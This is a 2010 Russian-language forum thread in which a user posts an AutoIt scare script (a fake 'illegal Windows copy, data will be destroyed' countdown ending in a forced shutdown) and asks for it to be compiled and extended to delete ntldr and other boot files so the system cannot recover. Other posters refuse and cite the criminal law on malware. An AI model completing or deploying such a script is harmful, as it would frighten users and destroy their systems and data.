Войти

Показать полную графическую версию : Скомпилировать скрипт AutoIt в *.exe

harleysoft
05-02-2010, 19:46
Доброго времени суток! Я полный чайник в AutoIt, Поэтому пишу сюда. не мог бы кто нибудь создать такую программу:
ProgressOn("Пожалуйста, подождите...", "Происходит уничтожение данных :)", "Система обнаружила использование нелегальной" & CHR(10) & "копии Windows. Через " & $j & " сек. все данные" & CHR(10) & "на ваших дисках будут уничтожены.")
For $i = 1 to 99 step 3.3
$j=$j-1
sleep(1000)
ProgressSet( $i, "Система обнаружила использование нелегальной" & CHR(10) & "копии Windows. Через " & $j & " сек. все данные" & CHR(10) & "на ваших дисках будут уничтожены.")
Next
ProgressSet(-1 , "Шеф! Все пропало. Прощайте.")
Shutdown(2)

sleep(5000)

Вот только надо что бы комп не просто перезагружался но и удалял файлик ntldr с Windows XP и cp_1251.nls и с висты\семёрки удалял тоже какой нибудь загрузочный файл. так чтобы система умирала без возможности восстановления.Заранее спасибо.

madmasles
05-02-2010, 20:06
harleysoft,
Вот Вы RadioLite делали, TV, а сейчас Вас, по моему мнению, куда-то не туда потянуло. Ни к чему это...

PS
Вот насчет радио я бы с удовольствием пообщался...

Coutty
05-02-2010, 20:07
harleysoft, вирусы пишете? Руководство для начинающих вирусописателей (УК РФ, ст. 273). (http://partnerstvo.ru/lib/ugpravo/node/147)

Sp01LeR
05-02-2010, 21:36
Coutty, в принцыпе и простым батником с одной строчкой можно винду "убить", так что лучше пусть делает GUI с "прогрес-баром" - хоть какой-то шанс успеть нажать резет у юзера будет... :coffee:

madmasles
05-02-2010, 21:41
Sp01LeR,
А еще есть "Пояс шахида" ... забанят нас за off top...

harleysoft
05-02-2010, 22:13
PS
Вот насчет радио я бы с удовольствием пообщался... »
ну давайте впринципе я не против!
вирусы пишете? »
Coutty, просто в учебнике по автоустановке есть такой скрипт. но вот я не разобрался как его в *.exe преобразовать. когда я там его преобразовал чё та какая то ошибка вылазит при запуске.